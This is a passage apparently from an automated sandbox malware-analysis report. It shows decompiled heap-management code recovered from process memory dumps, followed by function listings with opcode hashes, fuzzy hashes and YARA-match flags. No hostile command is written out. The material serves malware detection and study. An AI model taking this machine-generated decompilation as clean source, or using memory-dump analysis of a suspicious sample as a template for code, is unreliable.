										_t30 = _t157 + 8; // 0x8
										_t148 = _t30;
										_t130 =  *(_t148 + 0x10);
										if((_t130 & 0x00000fff) == 0 && _t130 >=  *((intOrPtr*)(_t163 + 0x1c)) &&  *((intOrPtr*)(_t148 + 0x14)) +  *(_t148 + 0x10) <=  *((intOrPtr*)(_t163 + 0x28))) {
											 *((intOrPtr*)(_t169 - 0x1c)) = 4;
											_t148 =  *_t148;
											_t134 =  *( *(_t157 + 0xc));
											 *(_t169 - 0x2c) = _t134;
											if(_t134 ==  *((intOrPtr*)(_t148 + 4))) {
												_t42 = _t157 + 8; // 0x8
												_t135 = _t42;
												if( *(_t169 - 0x2c) == _t135) {
													 *((intOrPtr*)(_t169 - 0x1c)) = 5;
													_t136 = _t135 + 8;
													 *(_t169 - 0x2c) = _t136;
													_t148 =  *_t136;
													_t138 =  *(_t136[1]);
													if(_t138 ==  *((intOrPtr*)(_t148 + 4)) && _t138 ==  *(_t169 - 0x2c)) {
														_t121 =  *(_t168 + 0x54) & 0x0000ffff;
														 *(_t169 - 0x24) = _t121;
														L23:
														 *((intOrPtr*)(_t169 - 0x1c)) = 7;
														_t148 =  *(_t157 + 4) & 0x0000ffff;
														if(_t121 == _t148) {
															L31:
															 *((intOrPtr*)(_t169 - 0x1c)) = 8;
															if(( *(_t157 + 2) & 0x00000001) != 0) {
																L34:
																 *((intOrPtr*)(_t169 - 0x1c)) = 9;
															} else {
																_t148 =  *(_t157 + 8);
																_t123 =  *( *(_t157 + 0xc));
																 *(_t169 - 0x2c) = _t123;
																if(_t123 ==  *((intOrPtr*)(_t148 + 4)) &&  *(_t169 - 0x2c) == _t157 + 8) {
																	goto L34;
																}
															}
														} else {
															_t127 = _t157 - ((_t148 ^ _t121 & 0x0000ffff) << 3);
															if( *(_t168 + 0x4c) == 0) {
																_t128 =  *_t127;
																_t154 =  *(_t169 - 0x24) & 0x0000ffff;
															} else {
																_t156 =  *_t127;
																 *(_t169 - 0x30) = _t156;
																if(( *(_t168 + 0x4c) & _t156) == 0) {
																	_t128 = _t156;
																} else {
																	_t128 =  *(_t168 + 0x50) ^ _t156;
																	 *(_t169 - 0x30) = _t128;
																}
																_t154 =  *(_t168 + 0x54) & 0x0000ffff;
															}
															 *(_t169 - 0x24) = _t154;
															_t148 =  *(_t157 + 4) & 0x0000ffff ^  *(_t169 - 0x24);
															if(_t128 == _t148) {
																goto L31;
															}
														}
													}
												}
											}
										}
									}
								} else {
									 *((intOrPtr*)(_t169 - 0x1c)) = 2;
									if(_t157 >=  *((intOrPtr*)(_t163 + 0x1c)) && _t157 <  *((intOrPtr*)(_t163 + 0x28)) &&  *((intOrPtr*)(_t163 + 0x18)) == _t168) {
										goto L12;
									}
								}
							}
						}
					}
					 *((intOrPtr*)(_t169 - 4)) = 0xfffffffe;
					if( *(_t168 + 0x4c) != 0) {
						 *(_t157 + 3) =  *(_t157 + 2) ^  *(_t157 + 1) ^  *_t157;
						 *_t157 =  *_t157 ^  *(_t168 + 0x50);
					}
					_t107 =  *((intOrPtr*)(_t169 - 0x1c));
					if(_t107 > 0xa) {
						L45:
						_push(_t148);
						_push(0);
						_push( *((intOrPtr*)(_t169 - 0x1c)));
						_push(_t157);
						_push(2);
						goto L46;
					} else {
						switch( *((intOrPtr*)(( *(_t107 + 0x1e45fcfb) & 0x000000ff) * 4 +  &M1E45FCE3))) {
							case 0:
								_push(_t148);
								_push(0);
								_push( *((intOrPtr*)(_t169 - 0x1c)));
								_push(_t157);
								_push(3);
								goto L46;
							case 1:
								_push(__ecx);
								_push(__ebx);
								_push( *((intOrPtr*)(__edi + 0x18)));
								_push(__edx);
								_push(0xc);
								goto L46;
							case 2:
								_push(__ecx);
								_push(__ebx);
								_push(3);
								_push(__edx);
								__ecx = 0;
								goto L47;
							case 3:
								_push(__ecx);
								_push(__ebx);
								_push( *((intOrPtr*)(__ebp - 0x1c)));
								_push(__edx);
								_push(0xe);
								goto L46;
							case 4:
								_push(__ecx);
								_push(__ebx);
								_push(8);
								_push(__edx);
								_push(0xd);
								L46:
								goto L47;
							case 5:
								goto L45;
						}
					}
					L47:
					_t98 = E1E46A80D(_t168);
				}
				return E1E3FD0D1(_t98);
			}


























                                  0x1e45fa2b
                                  0x1e45fa2b
                                  0x1e45fa2d
                                  0x1e45fa32
                                  0x1e45fa37
                                  0x1e45fa3a
                                  0x1e45fa3c
                                  0x1e45fa43
                                  0x1e45fa46
                                  0x1e45fa49
                                  0x1e45fa4f
                                  0x1e45fa55
                                  0x1e45fa58
                                  0x1e45fa5d
                                  0x1e45fa65
                                  0x1e45fa6d
                                  0x1e45fa72
                                  0x1e45fa78
                                  0x1e45fa7e
                                  0x1e45fa8c
                                  0x1e45faa2
                                  0x1e45faa7
                                  0x1e45faaa
                                  0x1e45faaf
                                  0x1e45fac4
                                  0x1e45fab1
                                  0x1e45fac0
                                  0x1e45fac0
                                  0x1e45fac8
                                  0x1e45facb
                                  0x1e45fad5
                                  0x1e45fadb
                                  0x1e45fae1
                                  0x1e45fb05
                                  0x1e45fb05
                                  0x1e45fb08
                                  0x1e45fb0b
                                  0x1e45fb15
                                  0x1e45fb98
                                  0x1e45fb9f
                                  0x1e45fba5
                                  0x1e45fbb4
                                  0x1e45fbb6
                                  0x1e45fbb7
                                  0x1e45fbbd
                                  0x00000000
                                  0x1e45fbbd
                                  0x1e45fb17
                                  0x1e45fb17
                                  0x1e45fb17
                                  0x1e45fb1a
                                  0x1e45fb22
                                  0x1e45fb40
                                  0x1e45fb47
                                  0x1e45fb4c
                                  0x1e45fb4e
                                  0x1e45fb54
                                  0x1e45fb5a
                                  0x1e45fb5a
                                  0x1e45fb60
                                  0x1e45fb66
                                  0x1e45fb6d
                                  0x1e45fb70
                                  0x1e45fb73
                                  0x1e45fb78
                                  0x1e45fb7d
                                  0x1e45fb8c
                                  0x1e45fb90
                                  0x1e45fbbf
                                  0x1e45fbbf
                                  0x1e45fbc6
                                  0x1e45fbcd
                                  0x1e45fc18
                                  0x1e45fc18
                                  0x1e45fc23
                                  0x1e45fc3d
                                  0x1e45fc3d
                                  0x1e45fc25
                                  0x1e45fc25
                                  0x1e45fc2b
                                  0x1e45fc2d
                                  0x1e45fc33
                                  0x00000000
                                  0x00000000
                                  0x1e45fc33
                                  0x1e45fbcf
                                  0x1e45fbd9
                                  0x1e45fbdf
                                  0x1e45fc00
                                  0x1e45fc06
                                  0x1e45fbe1
                                  0x1e45fbe1
                                  0x1e45fbe3
                                  0x1e45fbe9
                                  0x1e45fbf5
                                  0x1e45fbeb
                                  0x1e45fbee
                                  0x1e45fbf0
                                  0x1e45fbf0
                                  0x1e45fbf7
                                  0x1e45fbfb
                                  0x1e45fc09
                                  0x1e45fc10
                                  0x1e45fc16
                                  0x00000000
                                  0x00000000
                                  0x1e45fc16
                                  0x1e45fbcd
                                  0x1e45fb7d
                                  0x1e45fb60
                                  0x1e45fb54
                                  0x1e45fb22
                                  0x1e45fae3
                                  0x1e45fae3
                                  0x1e45faed
                                  0x00000000
                                  0x00000000
                                  0x1e45faed
                                  0x1e45fae1
                                  0x1e45fad5
                                  0x1e45fa8c
                                  0x1e45fc44
                                  0x1e45fc72
                                  0x1e45fc7c
                                  0x1e45fc82
                                  0x1e45fc82
                                  0x1e45fc84
                                  0x1e45fc8a
                                  0x1e45fcca
                                  0x1e45fcca
                                  0x1e45fccb
                                  0x1e45fccc
                                  0x1e45fccf
                                  0x1e45fcd0
                                  0x00000000
                                  0x1e45fc8c
                                  0x1e45fc93
                                  0x00000000
                                  0x1e45fc9a
                                  0x1e45fc9b
                                  0x1e45fc9c
                                  0x1e45fc9f
                                  0x1e45fca0
                                  0x00000000
                                  0x00000000
                                  0x1e45fca4
                                  0x1e45fca5
                                  0x1e45fca6
                                  0x1e45fca9
                                  0x1e45fcaa
                                  0x00000000
                                  0x00000000
                                  0x1e45fcae
                                  0x1e45fcaf
                                  0x1e45fcb0
                                  0x1e45fcb2
                                  0x1e45fcb3
                                  0x00000000
                                  0x00000000
                                  0x1e45fcb7
                                  0x1e45fcb8
                                  0x1e45fcb9
                                  0x1e45fcbc
                                  0x1e45fcbd
                                  0x00000000
                                  0x00000000
                                  0x1e45fcc1
                                  0x1e45fcc2
                                  0x1e45fcc3
                                  0x1e45fcc5
                                  0x1e45fcc6
                                  0x1e45fcd2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x1e45fc93
                                  0x1e45fcd3
                                  0x1e45fcd5
                                  0x1e45fcd5
                                  0x1e45fcdf

                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cec2b97265f4c5d3040a3192b3053e31e68ac88404c8a3ac84f7828d70a6812e
                                  • Instruction ID: c08cbc9f8241e6c8b5aa6a6f691dfd8f6b85466a0453b4d3055b9ea5cc95d22e
                                  • Opcode Fuzzy Hash: cec2b97265f4c5d3040a3192b3053e31e68ac88404c8a3ac84f7828d70a6812e
                                  • Instruction Fuzzy Hash: 34817D709002869FDB09CF59C494AAAF7F2FF48305F5482AAE851EB785D37498C2CF65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E46DBD2, Relevance: .2, Instructions: 212COMMONCrypto
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E1E46DBD2(intOrPtr* __ecx, unsigned int __edx, intOrPtr _a4, signed int _a8) {
				char _v5;
				signed short _v12;
				signed int _v16;
				void* _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				signed short _v40;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int* _t75;
				signed short _t77;
				intOrPtr _t78;
				signed int _t92;
				signed int _t98;
				signed int _t99;
				signed short _t105;
				unsigned int _t108;
				signed int _t112;
				signed int _t119;
				signed int _t124;
				intOrPtr _t137;
				signed char _t139;
				signed int _t140;
				unsigned int _t141;
				signed char _t142;
				intOrPtr _t152;
				signed int _t153;
				signed int _t158;
				signed int _t159;
				intOrPtr _t172;
				signed int _t176;
				signed int _t178;
				signed short _t182;
				intOrPtr _t183;

				_t119 = __edx;
				_v20 = __ecx;
				_t152 = _a4;
				_t172 = 0;
				_t182 = __edx >> 0x0000000c ^  *(__edx + 0x18) ^  *0x1e496114;
				_v16 = __edx;
				_v36 = 0;
				_v5 = 0xff;
				_v40 = _t182;
				_v24 = _t182 >> 0x10;
				if(_t152 == 0) {
					L14:
					_t124 =  *(_t119 + 0x12) & 0x0000ffff;
					_v24 = _t124;
					_t183 = _v36;
					_t53 = _t119 + 0x10; // 0x10
					_t75 = _t53;
					_v28 = _t75;
					_t77 =  *_t75 & 0x0000ffff;
					_v12 = _t77;
					L15:
					while(1) {
						if(_t183 != 0) {
							L20:
							_t153 = _t77 + 0x00000001 & 0x0000ffff;
							asm("lock cmpxchg [ebx], cx");
							_t119 = _v16;
							_t77 = _t77 & 0x0000ffff;
							_v12 = _t77;
							if(_t153 == (_t77 & 0x0000ffff) + 1) {
								if(_t77 == 0) {
									_t78 = _t172;
									L27:
									_t119 = L1E46D016(_t119, _t183, _t119, _t78);
									E1E3BFFB0(_t119, _t172, _t183 + 8);
									_t183 = _t172;
									if(_t119 != 0) {
										E1E46C52D(_v20,  *((intOrPtr*)(_v20 + 0x78 + ( *(((_v40 & 0x0000ffff) + 7 >> 3) + 0x1e38aff8) & 0x000000ff) * 4)), _t119, _a8);
									}
									L29:
									_t172 = 1;
									if(_t183 != 0) {
										_t72 = _t183 + 8; // 0x8
										E1E3BFFB0(_t119, 1, _t72);
									}
									L31:
									return _t172;
								}
								if((_t77 & 0x0000ffff) != _v24 - 1) {
									goto L29;
								}
								_t78 = 2;
								goto L27;
							}
							_t124 = _v24;
							continue;
						}
						if(_t77 == 0 || (_t77 & 0x0000ffff) == _t124 - 1) {
							_t183 = E1E46E018(_t119,  &_v5);
							if(_t183 == 0) {
								_t172 = 1;
								goto L31;
							}
							goto L19;
						} else {
							L19:
							_t77 = _v12;
							goto L20;
						}
					}
				}
				_t92 = _t182 & 0x0000ffff;
				_v28 = _t92;
				_t137 =  *((intOrPtr*)(__ecx + 0x78 + ( *((_t92 + 7 >> 3) + 0x1e38aff8) & 0x000000ff) * 4));
				_t98 =  *((intOrPtr*)(_t137 + 0x24));
				_t158 = _t152 - (_v24 & 0x0000ffff) - __edx;
				_v24 = _t98;
				_t99 = _t158;
				_v32 = _t158;
				_t139 =  *(_t137 + 0x28) & 0x000000ff;
				if(_t98 == 0) {
					_v12 = _t99 >> _t139;
					_t159 = _t158 & (1 << _t139) - 0x00000001;
					_t105 = _v12;
				} else {
					_t105 = E1E3ED340(_t99 * _v24, _t139, _t99 * _v24 >> 0x20);
					_v12 = _t105;
					_t159 = _v32 - _v28 * _t105;
				}
				if(_t159 == 0) {
					_t140 =  *(_t119 + 0x14) & 0x0000ffff;
					if(_t140 >= _t105) {
						_t140 = _t105 & 0x0000ffff;
					}
					 *(_t119 + 0x14) = _t140;
					_t141 = _t105 + _t105;
					_t142 = _t141 & 0x0000001f;
					_t176 = 3;
					_t178 =  !(_t176 << _t142);
					_t108 =  *(_t119 + (_t141 >> 5) * 4 + 0x20);
					do {
						asm("lock cmpxchg [ebx], edx");
					} while ((_t108 & _t178) != 0);
					if((_t108 >> _t142 & 0x00000001) != 0) {
						_t119 = _v16;
						_t172 = 0;
						if( *((char*)(_t119 + 0x1d)) > 1) {
							_t112 = E1E46D864(_t119, _a4 - _t119, _t182 & 0x0000ffff, 0,  &_v32);
							_t184 = _t112;
							if(_t112 != 0xffffffff) {
								asm("lock xadd [ecx], edx");
								E1E46D8DF(_v20, _t119, _t184, 2, _a8);
							}
						}
						goto L14;
					}
					_push(_t142);
					_push(_v12);
					E1E46A80D( *_v20, "true", _a4, _v16);
					_t172 = 0;
				}
			}








































                                  0x1e46dbdc
                                  0x1e46dbde
                                  0x1e46dbe1
                                  0x1e46dbed
                                  0x1e46dbef
                                  0x1e46dbf7
                                  0x1e46dbfd
                                  0x1e46dc00
                                  0x1e46dc04
                                  0x1e46dc07
                                  0x1e46dc0c
                                  0x1e46dd1f
                                  0x1e46dd1f
                                  0x1e46dd23
                                  0x1e46dd26
                                  0x1e46dd29
                                  0x1e46dd29
                                  0x1e46dd2c
                                  0x1e46dd32
                                  0x1e46dd35
                                  0x00000000
                                  0x1e46dd38
                                  0x1e46dd3a
                                  0x1e46dd5d
                                  0x1e46dd63
                                  0x1e46dd69
                                  0x1e46dd6e
                                  0x1e46dd71
                                  0x1e46dd78
                                  0x1e46dd7d
                                  0x1e46dd8c
                                  0x1e46dd9e
                                  0x1e46dda0
                                  0x1e46ddad
                                  0x1e46ddb0
                                  0x1e46ddb5
                                  0x1e46ddb9
                                  0x1e46ddd9
                                  0x1e46ddd9
                                  0x1e46ddde
                                  0x1e46dde0
                                  0x1e46dde3
                                  0x1e46dde5
                                  0x1e46dde9
                                  0x1e46dde9
                                  0x1e46ddee
                                  0x1e46ddf6
                                  0x1e46ddf6
                                  0x1e46dd97
                                  0x00000000
                                  0x00000000
                                  0x1e46dd9b
                                  0x00000000
                                  0x1e46dd9b
                                  0x1e46dd7f
                                  0x00000000
                                  0x1e46dd7f
                                  0x1e46dd3f
                                  0x1e46dd54
                                  0x1e46dd58
                                  0x1e46dd86
                                  0x00000000
                                  0x1e46dd86
                                  0x00000000
                                  0x1e46dd5a
                                  0x1e46dd5a
                                  0x1e46dd5a
                                  0x00000000
                                  0x1e46dd5a
                                  0x1e46dd3f
                                  0x1e46dd38
                                  0x1e46dc12
                                  0x1e46dc15
                                  0x1e46dc25
                                  0x1e46dc31
                                  0x1e46dc34
                                  0x1e46dc3b
                                  0x1e46dc3e
                                  0x1e46dc40
                                  0x1e46dc43
                                  0x1e46dc46
                                  0x1e46dc62
                                  0x1e46dc6b
                                  0x1e46dc6d
                                  0x1e46dc48
                                  0x1e46dc4b
                                  0x1e46dc59
                                  0x1e46dc5c
                                  0x1e46dc5c
                                  0x1e46dc72
                                  0x1e46dc78
                                  0x1e46dc7f
                                  0x1e46dc81
                                  0x1e46dc81
                                  0x1e46dc84
                                  0x1e46dc88
                                  0x1e46dc8d
                                  0x1e46dc95
                                  0x1e46dc9b
                                  0x1e46dca0
                                  0x1e46dca2
                                  0x1e46dca6
                                  0x1e46dca6
                                  0x1e46dcb0
                                  0x1e46dcd1
                                  0x1e46dcd4
                                  0x1e46dcda
                                  0x1e46dcec
                                  0x1e46dcf1
                                  0x1e46dcf6
                                  0x1e46dd0c
                                  0x1e46dd1a
                                  0x1e46dd1a
                                  0x1e46dcf6
                                  0x00000000
                                  0x1e46dcda
                                  0x1e46dcb5
                                  0x1e46dcb6
                                  0x1e46dcc5
                                  0x1e46dcca
                                  0x1e46dcca

                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 42c95ea19a0d12242c765fa67216cf44f23c5ad245df3ed0761039b56f4a7f77
                                  • Instruction ID: de7bd1c725eff31b130e7ef5654920bd70037667132363453884c0dfba872d46
                                  • Opcode Fuzzy Hash: 42c95ea19a0d12242c765fa67216cf44f23c5ad245df3ed0761039b56f4a7f77
                                  • Instruction Fuzzy Hash: A771A875E001695FCB04EF59C8909BEB7F6EF8C310B11426AE895EB345D734D986CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000BD8B1, Relevance: .2, Instructions: 197COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7f3ce132d8e4430ac58e39243aaf65699515e89a09c1d25b69e71ac9cf5b6e68
                                  • Instruction ID: df755b52e140b4ea87bb3162c3921b68a377b63da16d0f8181837dda3a33a36e
                                  • Opcode Fuzzy Hash: 7f3ce132d8e4430ac58e39243aaf65699515e89a09c1d25b69e71ac9cf5b6e68
                                  • Instruction Fuzzy Hash: 59A17433908382CFE716CF78DA89B513FB6F356324B08429EC5A197591D7316219CF88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000BCF83, Relevance: .2, Instructions: 184COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a48e78ca8a11178eb826c01a829b311d3be4048c9abd970f24ef2be8f649f183
                                  • Instruction ID: 86a6e525327abc43f9a4a955625d126c7e29b70858fde460cac07fd53e2ecc76
                                  • Opcode Fuzzy Hash: a48e78ca8a11178eb826c01a829b311d3be4048c9abd970f24ef2be8f649f183
                                  • Instruction Fuzzy Hash: CA915233908782CFE716DF78DA89B513FB6F356324B08429EC5A297592D7316219CF88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00085B1F, Relevance: .2, Instructions: 176COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 63e38cc04860cc156fbed1a4264af5f5c2f37f156aa9d970c5aac7fbf5d68150
                                  • Instruction ID: ad6c7958db771e5fd63ea7c9b6555ad0e724312f9ec9f6d80baa98197cb631bb
                                  • Opcode Fuzzy Hash: 63e38cc04860cc156fbed1a4264af5f5c2f37f156aa9d970c5aac7fbf5d68150
                                  • Instruction Fuzzy Hash: 12417474228A4C8F8F98EF3C809927AB7D3FB99301781476E94DBCB609DF3484418B41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000BE1F1, Relevance: .2, Instructions: 174COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1efa4e74f76d46fe376b01887f77eeff1bd22b2416b423e2ecc66cea5fd864c8
                                  • Instruction ID: 8cf152c1ed052bbc0ef45d8977ad4d12c68ee4b205204c9c8f348ac0c49133fe
                                  • Opcode Fuzzy Hash: 1efa4e74f76d46fe376b01887f77eeff1bd22b2416b423e2ecc66cea5fd864c8
                                  • Instruction Fuzzy Hash: 5D81EF32A4C3C1DFEB06EF78D89A6953FB1F7463207080799C9A15B2D2D3752166CB85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00085B22, Relevance: .2, Instructions: 167COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415891175.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5e026317e55c6306f062c495fde8b476288e1856e365cbfe34eac9301cd3fd02
                                  • Instruction ID: 038da6b3c8cf0f3a59592cb0dccf798c4de1c41ccc07c2ebad054bf515f20ba5
                                  • Opcode Fuzzy Hash: 5e026317e55c6306f062c495fde8b476288e1856e365cbfe34eac9301cd3fd02
                                  • Instruction Fuzzy Hash: 19418474228A4C8F8F98EF2C809927AB7E3FB99305781476E54DBCB609DF30C4414B41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000A2D90, Relevance: .2, Instructions: 165COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                  • Instruction ID: 14e3640ce911adebabd4a80b1b8cc9ad37b604a3bd2b170befccebf8a866eac1
                                  • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                  • Instruction Fuzzy Hash: 305160B3E14A214BD318CE09CC40635B792FFD8312B5F81BADD199B357CE74E9529A90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000A2D8A, Relevance: .2, Instructions: 160COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f3baf607dfd4ac87de293f7e320e513c221dcbd5eb44eaa6e0dc6af6cc05e873
                                  • Instruction ID: 3d3f5ec1c4244f5dd0ac6295a4acb9f23bc17fa5dd017b213d4b47e3eb2fbf95
                                  • Opcode Fuzzy Hash: f3baf607dfd4ac87de293f7e320e513c221dcbd5eb44eaa6e0dc6af6cc05e873
                                  • Instruction Fuzzy Hash: FF5171B3E14A214BD318CE19CC40631B692EFD8312B5B81BADD199B357CA74E9529A90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 000BE89C, Relevance: .1, Instructions: 146COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.415907039.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 39d03bdda398e5b06d1b0af76d2c56d2b5f0f4ab1e8190c94057d48fea23f70b
                                  • Instruction ID: 9034bcbb1f50a083cb967a71f8abfbe4556ce0d1ee35d3750488b63b64ae64f9
                                  • Opcode Fuzzy Hash: 39d03bdda398e5b06d1b0af76d2c56d2b5f0f4ab1e8190c94057d48fea23f70b
                                  • Instruction Fuzzy Hash: 14716332908795CFD32ACF74C88AA813FB5F742324B48425EC8E2975C5EB3465A6DF85
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E472B28, Relevance: .1, Instructions: 129COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7426f7c0ba6ebd951e42982b29c3598c81441f31d984211bd1d2d57c86c341d3
                                  • Instruction ID: 44a23216b840eba1021ab447d87e9db57f719fc0c02e50cc14421d5633b9e6e7
                                  • Opcode Fuzzy Hash: 7426f7c0ba6ebd951e42982b29c3598c81441f31d984211bd1d2d57c86c341d3
                                  • Instruction Fuzzy Hash: CE410BB3E105156FC314CF29C8819EAB7A9EF48A10B018B6EE855D7381D774EE06CBD4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E4722AE, Relevance: .1, Instructions: 116COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e885e77d02696f62d01261c79eb35b873ddf0e0bce1c0fb53b490fd9751d56f2
                                  • Instruction ID: ad9b03e02d4ce8881876fabb58f8f7246c089924273f0ebe406c573eadae0999
                                  • Opcode Fuzzy Hash: e885e77d02696f62d01261c79eb35b873ddf0e0bce1c0fb53b490fd9751d56f2
                                  • Instruction Fuzzy Hash: 7041E6715043428BC308CF25C8A19BABBE1EF85625F014B5EF4D19B282CF34D44AD7A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E472D07, Relevance: .1, Instructions: 112COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cfd0913ada339ce95b672f3707e3b9f36b80f64b2f389d289e17ba6a35c63c5c
                                  • Instruction ID: 0c7eb00457a3679edd3c2642be1a297abae6b3a4398d53debf40ae9d7df9a310
                                  • Opcode Fuzzy Hash: cfd0913ada339ce95b672f3707e3b9f36b80f64b2f389d289e17ba6a35c63c5c
                                  • Instruction Fuzzy Hash: CA4129719041654FC749CB66C8A0AFA7FF1FF85201B1642EBD881EB242DA38D546D7A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E472EF7, Relevance: .1, Instructions: 72COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4aaafbcb89aa5b542132b5573ca7a3347e7574ab2d4af81911cb69adf12a8bb4
                                  • Instruction ID: 518e556eb0e9a2ab83d72e5dfca275952ca86c127d810fbea33c46b1ee6645f2
                                  • Opcode Fuzzy Hash: 4aaafbcb89aa5b542132b5573ca7a3347e7574ab2d4af81911cb69adf12a8bb4
                                  • Instruction Fuzzy Hash: C121DD712041500FD745CF1AC8E09B6BFF5EFC611275682F6D984EF742C9289417D7A0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 1E471FF1, Relevance: .1, Instructions: 70COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.421351071.000000001E380000.00000040.00000001.sdmp, Offset: 1E380000, based on PE: true
                                  • Associated: 0000000C.00000002.421631214.000000001E49B000.00000040.00000001.sdmp Download File
                                  • Associated: 0000000C.00000002.421651645.000000001E49F000.00000040.00000001.sdmp Download File
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f69c954eea6c3f8ec6af87ea8f4fdc6b745dc70bddd99a598fa8ef5e677e3a8
                                  • Instruction ID: 3ebd6286762f97805d0898d12143836c04d6565cd6a34d39fd6b9f7e305a367b
                                  • Opcode Fuzzy Hash: 6f69c954eea6c3f8ec6af87ea8f4fdc6b745dc70bddd99a598fa8ef5e677e3a8
                                  • Instruction Fuzzy Hash: 2721A233A104259BDB18CF7CC8055A6F7E6FF9C21032A467BD912EB265EA70BD11CAC4
                                  Uniqueness

